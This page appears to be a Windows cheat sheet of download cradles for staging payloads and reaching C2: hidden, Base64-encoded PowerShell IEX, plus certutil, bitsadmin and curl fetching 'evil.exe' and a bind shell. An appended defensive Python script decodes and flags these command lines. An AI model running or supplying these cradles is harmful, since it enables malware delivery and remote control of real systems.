
Downloading remote files on Windows

Downloading remote files from the Windows command line and checking in to C2.

# PowerShell

Download to a local file:

```cmd
powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.txt','evil.exe')
```

Fetch the content with an HTTP request and execute it directly in memory:

```cmd
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.1/evil.txt'))"
```

Base64-encode the command to avoid escaping problems (the command is encoded as UTF-16 Little Endian first): PowerShell's `-EncodedCommand` expects the command bytes in UTF-16LE, then Base64:

```powershell
$command = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Write-Output $encoded
```

Run the Base64-encoded command directly with powershell, which sidesteps the escaping problems:

```cmd
powershell -nop -w hidden -EncodedCommand <the Base64 output from above>
```

# certutil

Download into the current directory:

```cmd
certutil -urlcache -split -f http://192.168.1.1/bind_shell_x64.exe bind_shell_x64.exe
```

# bitsadmin

```cmd
bitsadmin /transfer jobName /download /priority high http://192.168.1.1/evil.exe evil.exe
```

# curl (Windows 10 and later)

Rarely present on older systems.

```cmd
curl -o bind_shell_x64.exe http://192.168.1.1/bind_shell_x64.exe
```
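As an added example from the defender's side (not part of the original page), the Python script below covers the PowerShell encoding section and the certutil, bitsadmin and curl sections together. It reproduces the UTF-16LE-then-Base64 encoding that `-EncodedCommand` expects, decodes such a payload back out of a recorded process command line so the inner command becomes visible, and flags the download patterns listed on this page. The sample command lines (in the shape Sysmon Event ID 1 or Security event 4688 record them), the rule names and the `-enc`/`-ec`/`-e` abbreviations handled by the regex are constructed or assumed for this example.

```python
import base64
import re
from typing import List, Optional

# Inner command from the page's encoding snippet; used to build a sample
# -EncodedCommand line below so the Base64 is exactly what that snippet emits.
INNER_COMMAND = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.1/evil.txt'))"


def encode_powershell_command(command: str) -> str:
    """Encode as -EncodedCommand expects: UTF-16LE bytes, then Base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse of the above; None when the payload is not valid Base64 / UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed sample command lines (no real host data). The last two are benign controls.
SAMPLE_COMMAND_LINES = [
    "powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/evil.txt','evil.exe')",
    "powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.1/evil.txt'))\"",
    "powershell -nop -w hidden -EncodedCommand " + encode_powershell_command(INNER_COMMAND),
    "certutil -urlcache -split -f http://192.168.1.1/bind_shell_x64.exe bind_shell_x64.exe",
    "bitsadmin /transfer jobName /download /priority high http://192.168.1.1/evil.exe evil.exe",
    "curl -o bind_shell_x64.exe http://192.168.1.1/bind_shell_x64.exe",
    "certutil -hashfile C:\\Windows\\notepad.exe SHA256",
    "powershell -c Get-Process",
]

# -EncodedCommand and the abbreviations PowerShell accepts for it, then the Base64 payload.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[^\s'\"<>)]+")

# (rule name, pattern); the names are constructed for this example.
RULES = [
    ("powershell_download", re.compile(r"webclient\)?\s*\.\s*download(?:file|string)\s*\(", re.I)),
    ("powershell_iex", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("hidden_window", re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(?:\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(?:\.exe)?\b.*/(?:transfer|addfile)\b", re.I)),
    ("curl_to_file", re.compile(r"\bcurl(?:\.exe)?\b(?=.*\s(?:-o|--output)\b)(?=.*https?://)", re.I)),
]


def analyze_command_line(command_line: str) -> dict:
    """Return rule hits, the decoded -EncodedCommand payload (if any) and URLs seen."""
    flags: List[str] = []
    decoded: Optional[str] = None
    match = ENCODED_FLAG.search(command_line)
    if match:
        decoded = decode_encoded_command(match.group(1))
        if decoded is not None:
            flags.append("encoded_command")
    # Match the rules against the outer line plus the decoded inner command, so an
    # encoded cradle is judged by what it does rather than by how it was wrapped.
    text = command_line if decoded is None else command_line + "\n" + decoded
    for name, pattern in RULES:
        if pattern.search(text):
            flags.append(name)
    urls: List[str] = []
    for url in URL.findall(text):
        if url not in urls:
            urls.append(url)
    return {"command_line": command_line, "flags": flags, "decoded": decoded, "urls": urls}


def scan(command_lines: List[str]) -> List[dict]:
    """Keep only the command lines that triggered at least one rule."""
    return [r for r in (analyze_command_line(c) for c in command_lines) if r["flags"]]


if __name__ == "__main__":
    for hit in scan(SAMPLE_COMMAND_LINES):
        print(", ".join(hit["flags"]), "|", hit["decoded"] or hit["command_line"])
```

Because the Base64 payload lands in the process command line unchanged, decoding it is a cheap step to run before any pattern matching; the script appends the decoded text to the outer line so the same rules apply to both. Rules are matched per line, so `.*` never bridges the outer command and the decoded one.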
Last updated: 2025/10/04, 14:38:57